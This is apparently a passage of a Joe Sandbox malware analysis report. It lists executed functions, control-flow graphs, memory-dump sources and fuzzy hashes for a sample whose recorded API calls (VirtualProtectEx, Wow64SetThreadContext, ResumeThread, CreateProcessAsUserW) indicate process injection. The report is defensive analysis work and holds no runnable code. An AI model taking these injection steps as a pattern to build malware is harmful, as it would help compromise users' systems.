65457->65455 65460 756e700 VirtualProtect 65458->65460 65461 756e708 VirtualProtect 65458->65461 65459 721dc3d 65460->65459 65461->65459 65463 756e706 VirtualProtect 65462->65463 65464 756e6b4 65462->65464 65466 756e78a 65463->65466 65464->65430 65466->65430 65468 756e750 VirtualProtect 65467->65468 65469 756e78a 65468->65469 65469->65430 65474 76886b0 65475 76886f8 VirtualProtectEx 65474->65475 65477 7688736 65475->65477 65478 7688e80 65479 7688ec5 Wow64SetThreadContext 65478->65479 65481 7688f0d 65479->65481 65482 7689880 65483 7689a0b 65482->65483 65485 76898a6 65482->65485 65485->65483 65486 7688f98 65485->65486 65487 7689b00 PostMessageW 65486->65487 65488 7689b6c 65487->65488 65488->65485 65493 7689510 65494 7689550 ResumeThread 65493->65494 65496 7689581 65494->65496

                Executed Functions

                Function 00EA74D8 Relevance: 12.2, Strings: 9, Instructions: 971COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: (ocq$(ocq$(ocq$(ocq$(ocq$(ocq$(ocq$,gq$,gq
                • API String ID: 0-1821904394
                • Opcode ID: 739a44d97a517655a6140336b7f6daa7138adc4bdef75647b71abf526b1482f8
                • Instruction ID: 218b0f200fe8c4c741254ffdf675ee9102470766e0ed2237313ae6e2b8ef3962
                • Opcode Fuzzy Hash: 739a44d97a517655a6140336b7f6daa7138adc4bdef75647b71abf526b1482f8
                • Instruction Fuzzy Hash: 58924870A046099FCB14CF68C984AAEBBF2FF8A315F259559E445AB3A1DB30FD41CB50
                Function 00EA65E8 Relevance: 11.1, Strings: 8, Instructions: 1146COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: (ocq$(ocq$(ocq$,gq$,gq$,gq$,gq$Hgq
                • API String ID: 0-3581845439
                • Opcode ID: f72814a8b47d663cde12637a86af75da67675bebd99182b6a6a1ee5f047295d8
                • Instruction ID: da2b4535d22476334979c4c9c187b9e8e725dc92c124c68d87341d6f36d91ae7
                • Opcode Fuzzy Hash: f72814a8b47d663cde12637a86af75da67675bebd99182b6a6a1ee5f047295d8
                • Instruction Fuzzy Hash: 31A26E71A001198FCB14DF68C994AAEBBB6FF8E304F159069E455EB3A1DB34ED41CB90
                Function 07B7A924 Relevance: 11.0, Strings: 8, Instructions: 962COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 642 7b7a924-7b7dd47 645 7b7def5-7b7df46 642->645 646 7b7dd4d-7b7dd53 642->646 671 7b7df60-7b7df7a 645->671 672 7b7df48-7b7df55 645->672 647 7b7dd55-7b7dd5c 646->647 648 7b7dd94-7b7dda8 646->648 652 7b7dd76-7b7dd8f call 7b7d7b0 647->652 653 7b7dd5e-7b7dd6b 647->653 650 7b7ddca-7b7ddd3 648->650 651 7b7ddaa-7b7ddae 648->651 655 7b7ddd5-7b7dde2 650->655 656 7b7dded-7b7de09 650->656 651->650 654 7b7ddb0-7b7ddbc 651->654 652->648 653->652 654->650 665 7b7ddbe-7b7ddc4 654->665 655->656 667 7b7deb1-7b7ded5 656->667 668 7b7de0f-7b7de1a 656->668 665->650 679 7b7ded7 667->679 680 7b7dedf-7b7dee0 667->680 677 7b7de32-7b7de39 668->677 678 7b7de1c-7b7de22 668->678 681 7b7dfc1-7b7dfc8 671->681 682 7b7df7c-7b7df83 671->682 672->671 685 7b7de4d-7b7de70 call 7b7959c 677->685 686 7b7de3b-7b7de45 677->686 683 7b7de26-7b7de28 678->683 684 7b7de24 678->684 679->680 680->645 690 7b7dfe2-7b7dfeb 681->690 691 7b7dfca-7b7dfd7 681->691 688 7b7df85-7b7df92 682->688 689 7b7df9d-7b7dfb2 682->689 683->677 684->677 699 7b7de72-7b7de7f 685->699 700 7b7de81-7b7de92 685->700 686->685 688->689 689->681 703 7b7dfb4-7b7dfbb 689->703 693 7b7dff1-7b7dff4 690->693 694 7b7dfed-7b7dfef 690->694 691->690 697 7b7dff5-7b7e006 693->697 694->697 709 7b7e049-7b7e04c 697->709 710 7b7e008-7b7e00f 697->710 699->700 708 7b7de9f-7b7deab 699->708 700->708 711 7b7de94-7b7de97 700->711 703->681 707 7b7e04f-7b7e060 703->707 716 7b7e066 707->716 708->667 708->668 713 7b7e011-7b7e015 710->713 714 7b7e029-7b7e03e 710->714 711->708 717 7b7e01e 713->717 714->709 719 7b7e040-7b7e047 714->719 716->717 720 7b7e068-7b7e07a call 7b75f60 716->720 717->714 719->709 721 7b7e081-7b7e0c0 call 7b75f60 719->721 720->721 721->716 731 7b7e0c2-7b7e0e2 721->731 732 7b7e0e4-7b7e0f7 731->732 733 7b7e0fa-7b7e100 731->733 734 7b7e102-7b7e109 733->734 735 7b7e170-7b7e1c8 733->735 736 7b7e1cf-7b7e227 734->736 737 7b7e10f-7b7e11f 734->737 735->736 743 7b7e22e-7b7e2b0 736->743 742 7b7e125-7b7e129 737->742 737->743 746 7b7e12c-7b7e12e 742->746 777 7b7e2b7-7b7e310 743->777 749 7b7e153-7b7e155 746->749 750 7b7e130-7b7e140 746->750 752 7b7e157-7b7e161 749->752 753 7b7e164-7b7e16d 749->753 758 7b7e142-7b7e151 750->758 759 7b7e12b 750->759 758->749 758->759 759->746 785 7b7e312-7b7e33c 777->785 786 7b7e38e-7b7e3e6 785->786 787 7b7e33e-7b7e34e 785->787 791 7b7e3ed-7b7e4fa 786->791 790 7b7e354-7b7e358 787->790 787->791 793 7b7e35b-7b7e35d 790->793 825 7b7e512-7b7e518 791->825 826 7b7e4fc-7b7e50f 791->826 794 7b7e371-7b7e373 793->794 795 7b7e35f-7b7e36f 793->795 797 7b7e375-7b7e37f 794->797 798 7b7e382-7b7e38b 794->798 795->794 802 7b7e35a 795->802 802->793 827 7b7e592-7b7e5ea 825->827 828 7b7e51a-7b7e521 825->828 831 7b7e5f1-7b7e649 827->831 830 7b7e527-7b7e52b 828->830 828->831 832 7b7e531-7b7e535 830->832 833 7b7e650-7b7e754 830->833 831->833 835 7b7e538-7b7e545 832->835 879 7b7e756-7b7e75a 833->879 880 7b7e7b0-7b7e808 833->880 842 7b7e547-7b7e557 835->842 843 7b7e56a-7b7e577 835->843 852 7b7e537 842->852 853 7b7e559-7b7e568 842->853 850 7b7e586-7b7e58f 843->850 851 7b7e579-7b7e583 843->851 852->835 853->843 853->852 881 7b7e760-7b7e764 879->881 882 7b7e80f-7b7e908 879->882 880->882 883 7b7e767-7b7e774 881->883 920 7b7e920-7b7e921 882->920 921 7b7e90a-7b7e910 882->921 889 7b7e776-7b7e786 883->889 890 7b7e788-7b7e795 883->890 889->890 896 7b7e766 889->896 897 7b7e797-7b7e7a1 890->897 898 7b7e7a4-7b7e7ad 890->898 896->883 922 7b7e914-7b7e916 921->922 923 7b7e912 921->923 922->920 923->920
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509920477.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7b70000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: (gq$Hgq$Hgq$Hgq$Hgq$Hgq$Hgq$PHcq
                • API String ID: 0-1368273707
                • Opcode ID: 5185304a665fb7399e880b3e8a766f1a2a862de82b9d34b35d87c16237feb9f6
                • Instruction ID: e209716879a4cd55b90cef1d41dd3f715e5bf7910071a256e79c5510af87011b
                • Opcode Fuzzy Hash: 5185304a665fb7399e880b3e8a766f1a2a862de82b9d34b35d87c16237feb9f6
                • Instruction Fuzzy Hash: 0962CFB1B001158FDB18EB79C85466E7BA7EFC8320F2485A9E41ADB3A1DE34DD42C791
                Function 07211C51 Relevance: 5.6, Instructions: 5640COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1236 7211c51-7211e97 1264 7211e9d-7212be2 1236->1264 1265 7213eec-72141d2 1236->1265 1673 7212be8-7212ec6 1264->1673 1674 7212ece-7213ee4 1264->1674 1340 72141d8-7215183 1265->1340 1341 721518b-7216206 1265->1341 1340->1341 1931 721654d-7216560 1341->1931 1932 721620c-7216545 1341->1932 1673->1674 1674->1265 1936 7216566-7216c05 1931->1936 1937 7216c0d-7217ae6 1931->1937 1932->1931 1936->1937 2320 7217ae6 call 7219200 1937->2320 2321 7217ae6 call 72191f0 1937->2321 2319 7217aec-7217af3 2320->2319 2321->2319
                Memory Dump Source
                • Source File: 00000000.00000002.2509104692.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7210000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 41a0661564c38679c5d64fe6b3e22fcc6e5a6fe15aa86475de90855e986218f3
                • Instruction ID: bca6f8c0fe367c7411b80b3bedc57023c8ed16b1dd86fa78c7e167522dc960d3
                • Opcode Fuzzy Hash: 41a0661564c38679c5d64fe6b3e22fcc6e5a6fe15aa86475de90855e986218f3
                • Instruction Fuzzy Hash: 1EC3F870A11618CFCB18EF78EA9966CBBB2BB89301F4049E9D449A7354DF349E85CF41
                Function 07211C68 Relevance: 5.6, Instructions: 5633COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2322 7211c68-7211e97 2350 7211e9d-7212be2 2322->2350 2351 7213eec-72141d2 2322->2351 2759 7212be8-7212ec6 2350->2759 2760 7212ece-7213ee4 2350->2760 2426 72141d8-7215183 2351->2426 2427 721518b-7216206 2351->2427 2426->2427 3017 721654d-7216560 2427->3017 3018 721620c-7216545 2427->3018 2759->2760 2760->2351 3022 7216566-7216c05 3017->3022 3023 7216c0d-7217ae6 3017->3023 3018->3017 3022->3023 3406 7217ae6 call 7219200 3023->3406 3407 7217ae6 call 72191f0 3023->3407 3405 7217aec-7217af3 3406->3405 3407->3405
                Memory Dump Source
                • Source File: 00000000.00000002.2509104692.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7210000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e3bd177f4f4077d018208003b3d6933e75d8c647424b0354ebdcc769bd595b3a
                • Instruction ID: 9f25660ab1e0c5df870e0b90765a5decea86a2c42c60fd13e22c878d3bacc12b
                • Opcode Fuzzy Hash: e3bd177f4f4077d018208003b3d6933e75d8c647424b0354ebdcc769bd595b3a
                • Instruction Fuzzy Hash: 40C3F870A11618CFCB18EF78EA9966CBBB2BB89301F4049E9D449A7354DF349E85CF41
                Function 07CD2708 Relevance: 5.2, Instructions: 5170COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 4382 7cd2708-7cd2976 5340 7cd2978 call 7cd8e80 4382->5340 5341 7cd2978 call 7cd8e90 4382->5341 4410 7cd297e-7cd7dd1 5338 7cd7dd3 call 7cd952f 4410->5338 5339 7cd7dd3 call 7cd9540 4410->5339 5337 7cd7dd9-7cd7de0 5338->5337 5339->5337 5340->4410 5341->4410
                Memory Dump Source
                • Source File: 00000000.00000002.2510069372.0000000007CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CD0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7cd0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 434ca6286a70951a312b06d9f724cef51f4d208bf8f346241f16378d8ebc33d2
                • Instruction ID: e64b9d6ccdcec3ba493598702ddadaf6afcb49f8063b3d60f38cfe177fb8c8e8
                • Opcode Fuzzy Hash: 434ca6286a70951a312b06d9f724cef51f4d208bf8f346241f16378d8ebc33d2
                • Instruction Fuzzy Hash: F6B3F970A11618CFCB18EF79DA896ACBBF2BB88301F4089E9D489A3254DF345D95CF51
                Function 0756E801 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 5342 756e801-756e82a 5343 756e831-756e8dc 5342->5343 5344 756e82c 5342->5344 5354 756e8df 5343->5354 5344->5343 5355 756e8e6-756e902 5354->5355 5356 756e904 5355->5356 5357 756e90b-756e90c 5355->5357 5356->5354 5356->5357 5358 756e945-756e95f 5356->5358 5359 756e9b5-756ea26 5356->5359 5360 756e911-756e915 5356->5360 5361 756e961-756e9a0 5356->5361 5362 756ea78-756ea7e 5356->5362 5357->5362 5358->5355 5377 756ea2f-756ea45 5359->5377 5363 756e917-756e926 5360->5363 5364 756e928-756e92f 5360->5364 5382 756e9a2 call 756ff30 5361->5382 5383 756e9a2 call 756ff20 5361->5383 5365 756e936-756e943 5363->5365 5364->5365 5365->5355 5376 756e9a8-756e9b0 5376->5355 5379 756ea47-756ea56 5377->5379 5380 756ea58-756ea5f 5377->5380 5381 756ea66-756ea73 5379->5381 5380->5381 5381->5355 5382->5376 5383->5376
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Q!$Q!$$cq
                • API String ID: 0-1686694922
                • Opcode ID: 2b1458d107e9a786c8f385c7596766cec4c61c45489a9ce804df3017961f1b24
                • Instruction ID: f0c3ab1a5afd2138393565b603e24b5262031796ed178f64d610946d0a75ca69
                • Opcode Fuzzy Hash: 2b1458d107e9a786c8f385c7596766cec4c61c45489a9ce804df3017961f1b24
                • Instruction Fuzzy Hash: 0E7116B4E11209DFDB04CFA9D5996EEBFB2BF88300F20852AE40AAB354DB305945CF51
                Function 0756B940 Relevance: 3.9, Strings: 3, Instructions: 146COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 5384 756b940-756b94c 5385 756b8f2 5384->5385 5386 756b94e-756b96e 5384->5386 5389 756b8f6-756b908 5385->5389 5387 756b975-756b97a 5386->5387 5388 756b970 5386->5388 5415 756b97d call 756ba48 5387->5415 5416 756b97d call 756ba39 5387->5416 5388->5387 5390 756b80b-756b827 5389->5390 5392 756b830-756b831 5390->5392 5393 756b829 5390->5393 5391 756b983 5394 756b98a-756b9a6 5391->5394 5398 756b90d-756b914 5392->5398 5393->5389 5393->5392 5395 756b836-756b870 5393->5395 5396 756b804 5393->5396 5397 756b872-756b887 5393->5397 5393->5398 5399 756b8aa-756b8ae 5393->5399 5400 756b8da-756b8f1 5393->5400 5401 756b889-756b8a5 5393->5401 5404 756b9af-756b9b0 5394->5404 5405 756b9a8 5394->5405 5395->5390 5396->5390 5397->5390 5402 756b8b0-756b8bf 5399->5402 5403 756b8c1-756b8c8 5399->5403 5400->5390 5401->5390 5407 756b8cf-756b8d5 5402->5407 5403->5407 5410 756ba1d-756ba21 5404->5410 5405->5391 5405->5404 5408 756b9f6-756ba18 5405->5408 5409 756b9b2-756b9c6 5405->5409 5405->5410 5407->5390 5408->5394 5412 756b9c8-756b9d7 5409->5412 5413 756b9d9-756b9e0 5409->5413 5414 756b9e7-756b9f4 5412->5414 5413->5414 5414->5394 5415->5391 5416->5391
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: tu}s$tu}s${ :
                • API String ID: 0-3169588376
                • Opcode ID: 2207fbb81b660f9ccee0285fc3a4a8a9621ace0b771560e284e76bbdcfc02172
                • Instruction ID: 0e2e17a52c958d66438e03480022f060587f023bb2e22bf336d9ced012b0e104
                • Opcode Fuzzy Hash: 2207fbb81b660f9ccee0285fc3a4a8a9621ace0b771560e284e76bbdcfc02172
                • Instruction Fuzzy Hash: 805147B0E1521A8FDB44CF99C5845EEFBF1FF89210F24896AD415E7264E7309A41CB51
                Function 07560006 Relevance: 3.0, Instructions: 2975COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 5620 7560006-756008c 5624 7560182-756177f 5620->5624 5625 7560092-756017a 5620->5625 6226 7561785 call 7564190 5624->6226 6227 7561785 call 7564180 5624->6227 5625->5624 5903 7561788-7563092 6228 7563094 call ea5138 5903->6228 6229 7563094 call ea5108 5903->6229 6209 7563099-7563312 6226->5903 6227->5903 6228->6209 6229->6209
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 735f2820740cc07913dc570aae9c3e3ea8f7b666e1c64f5267a509fe9b91c8a0
                • Instruction ID: 9826828d6f058da83639edaf930af5832698c8424963a9f51cd77727c1b6a1f5
                • Opcode Fuzzy Hash: 735f2820740cc07913dc570aae9c3e3ea8f7b666e1c64f5267a509fe9b91c8a0
                • Instruction Fuzzy Hash: C8436F70E10619CBCB14FF78D98979DBBB5BB84305F4089E9D048A3258DF34AE88DB55
                Function 07686238 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Q+(i$Q+(i
                • API String ID: 0-3998099878
                • Opcode ID: ed6fc23cb5bd327f549d7a04c3b6fc8233f8d3ded8c774ac30bf9c0a61b193ab
                • Instruction ID: 5f8cd2ab5f1400a1ee4671ff3fcb8ff46d9caa3207275613e0b2634d4c6efbf1
                • Opcode Fuzzy Hash: ed6fc23cb5bd327f549d7a04c3b6fc8233f8d3ded8c774ac30bf9c0a61b193ab
                • Instruction Fuzzy Hash: 798120B0D11219CFCB44DFA9C994AEEBBB2BF89300F24852AD816BB354DB345946CF51
                Function 07569360 Relevance: 2.7, Strings: 2, Instructions: 177COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Tecq$Tecq
                • API String ID: 0-2088518435
                • Opcode ID: 3bf43368add7305d5428e57cc1bc7251b996b5c55c2dbf15c0a540eba376a611
                • Instruction ID: e8afe7877f320d4368e0cedf04629d3ce60ad58898625447b889d8127b717857
                • Opcode Fuzzy Hash: 3bf43368add7305d5428e57cc1bc7251b996b5c55c2dbf15c0a540eba376a611
                • Instruction Fuzzy Hash: AE71B2B4E112198FDB08CFA9C994AEEFBB2FF89301F10852AD915AB354DB356905CF50
                Function 07569350 Relevance: 2.7, Strings: 2, Instructions: 176COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Tecq$Tecq
                • API String ID: 0-2088518435
                • Opcode ID: d2907ffbe885151ef4c52e9e4d69bbdd9c9cc13fc26062015545386a3cadccae
                • Instruction ID: 26d5b5ce1e7f02753104baa8403fe57a0e0d707849b13863ae8ac49f01c1b154
                • Opcode Fuzzy Hash: d2907ffbe885151ef4c52e9e4d69bbdd9c9cc13fc26062015545386a3cadccae
                • Instruction Fuzzy Hash: A571D3B4E102098FCB08CFA9C994ADEFBB2FF89310F10852AD915AB354DB346905CF50
                Function 07685CA0 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON
                Download Yara Rule
                APIs
                • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 07685E0B
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: CreateProcessUser
                • String ID:
                • API String ID: 2217836671-0
                • Opcode ID: ccaf7f7c84e45b640343bf582f5b0e5499c4cb52f4aa0292520cd1491c533ec5
                • Instruction ID: 216fa6968e1f41f50155762c28a4ec24582810a63426b567072d6467a0ba5a80
                • Opcode Fuzzy Hash: ccaf7f7c84e45b640343bf582f5b0e5499c4cb52f4aa0292520cd1491c533ec5
                • Instruction Fuzzy Hash: 7C5109B1D0021ADFCB25DF69C844BDDBBB5BF48310F0485AAE919B7250DB71AA89CF50
                Function 00EABF44 Relevance: 1.7, Strings: 1, Instructions: 402COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Tecq
                • API String ID: 0-1122318316
                • Opcode ID: ead8aa6a3068195277598cea02225baca7abe9a8ec2eec2f092baf54b7fffadc
                • Instruction ID: 7575e4fbd182494dcfeb83f318e8777f98fc7c9dd2f5eb0bc7e9ebe16952fc50
                • Opcode Fuzzy Hash: ead8aa6a3068195277598cea02225baca7abe9a8ec2eec2f092baf54b7fffadc
                • Instruction Fuzzy Hash: 3502DC74E01218CFDB24DFA5C954B9EBBB2BF89301F2480A9D409AB365DB359D86CF11
                Function 00EABFB1 Relevance: 1.6, Strings: 1, Instructions: 367COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Tecq
                • API String ID: 0-1122318316
                • Opcode ID: 9eb3cd2d6007b0704d439bdafd6687fcdfbbaf14e9168ce7ee1efea05c263cdc
                • Instruction ID: 9d480d44340579254c6b99bc0c0e30623257a4f0730b93b97c6208888767fbc8
                • Opcode Fuzzy Hash: 9eb3cd2d6007b0704d439bdafd6687fcdfbbaf14e9168ce7ee1efea05c263cdc
                • Instruction Fuzzy Hash: F5F1CB74E01218CFDB24DFA5C954B9EBBB2BF89301F2090A9D409BB365DB359986DF10
                Function 07568721 Relevance: 1.6, APIs: 1, Instructions: 105memoryCOMMON
                Download Yara Rule
                APIs
                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 075686E3
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 848b6cafd49e7ee53d3161ffe3e091f53dbedf0230c9f2359de4eb2e8c3945ab
                • Instruction ID: 29f2c448b1da2545d956659a2b779270dc75281d4420a19d36a5fba04fe2784b
                • Opcode Fuzzy Hash: 848b6cafd49e7ee53d3161ffe3e091f53dbedf0230c9f2359de4eb2e8c3945ab
                • Instruction Fuzzy Hash: 854104B1E006098FEB18CFAAC8447DEFBF7AB88300F14C06AD518A7260EB345A55CF51
                Function 07686231 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Q+(i
                • API String ID: 0-266234252
                • Opcode ID: cf1ffd60d6f97f7a9d701b5d2db92349b38d28f25a4ed4103ae9c53f577aab9d
                • Instruction ID: 8e7b83e25942630d94c1943520436c16afecde0313bebf3181bc76fdf680b8ae
                • Opcode Fuzzy Hash: cf1ffd60d6f97f7a9d701b5d2db92349b38d28f25a4ed4103ae9c53f577aab9d
                • Instruction Fuzzy Hash: 947120B0D11219CFCB44DFA9C994AEEBBB2BF89301F24852AD816BB344DB345941CF55
                Function 07567750 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: <
                • API String ID: 0-4251816714
                • Opcode ID: 495761bbbbe13f7968f72a47664248a875fff7441066e18f86279df5d4d1efb8
                • Instruction ID: 2e36b0f2c62da739e1e0c6ea2672a3fc0127f5a365292fcbcf0810fc31a2b0d6
                • Opcode Fuzzy Hash: 495761bbbbe13f7968f72a47664248a875fff7441066e18f86279df5d4d1efb8
                • Instruction Fuzzy Hash: 946175B5D01658CFDB58CFAAC9446DDBBF2BF89301F14C5AAD408AB224EB345A85CF50
                Function 07689E30 Relevance: .6, Instructions: 624COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a0ac1e62f780f6b2007d3244844fc9c221b2aa0ccbf1c0efe8a0f53d298e1a11
                • Instruction ID: bf59864a35938982273ccb599cae10655877194d430c5ea0b0dba54bb03b2ea0
                • Opcode Fuzzy Hash: a0ac1e62f780f6b2007d3244844fc9c221b2aa0ccbf1c0efe8a0f53d298e1a11
                • Instruction Fuzzy Hash: E832CBB0B012058FDB59EFB9D454BAEB7F6AF88700F14856AE5469B390CB34ED01CB61
                Function 07B725C8 Relevance: .6, Instructions: 596COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509920477.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7b70000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c86accbba9e0479df0519c566d706aeb51c7b52ee69c6e4e574c734f897d3af9
                • Instruction ID: f326c3e71e7b8def1a2364bd49808290b28198facf14080ed8cea97a12bce51b
                • Opcode Fuzzy Hash: c86accbba9e0479df0519c566d706aeb51c7b52ee69c6e4e574c734f897d3af9
                • Instruction Fuzzy Hash: E7525C74A003558FCB14DF28C844B99B7B2FF85314F2586A9E5586F3A2DB71AD82CF81
                Function 07B725B8 Relevance: .6, Instructions: 585COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509920477.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7b70000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bdcc612d0ebd88dee2c8f477d82c649f1707fdbe2f636aead9d628c2569902d9
                • Instruction ID: e34b8f2200bc460d31c2444037c104d4d6d65dfe2bd374819e502b9c6c4c2e04
                • Opcode Fuzzy Hash: bdcc612d0ebd88dee2c8f477d82c649f1707fdbe2f636aead9d628c2569902d9
                • Instruction Fuzzy Hash: DA526D74A003458FCB14DF28C844B99B7B2FF85314F2586E9E5586F3A2DB71A982CF81
                Function 0756B336 Relevance: .3, Instructions: 291COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4b0d776c3d313603fce891fff5eeb6ab50d77f43d150b55ca0e513bdd84e2490
                • Instruction ID: 3f0f60d6211dac9460c102cc22f21665bf0d05adb8a45e50f6c8ef990f6a94dd
                • Opcode Fuzzy Hash: 4b0d776c3d313603fce891fff5eeb6ab50d77f43d150b55ca0e513bdd84e2490
                • Instruction Fuzzy Hash: 34C109F4E1120ADFCB04DFA9C4858EEFBB2FF89301B249556D416AB254D734A982CF91
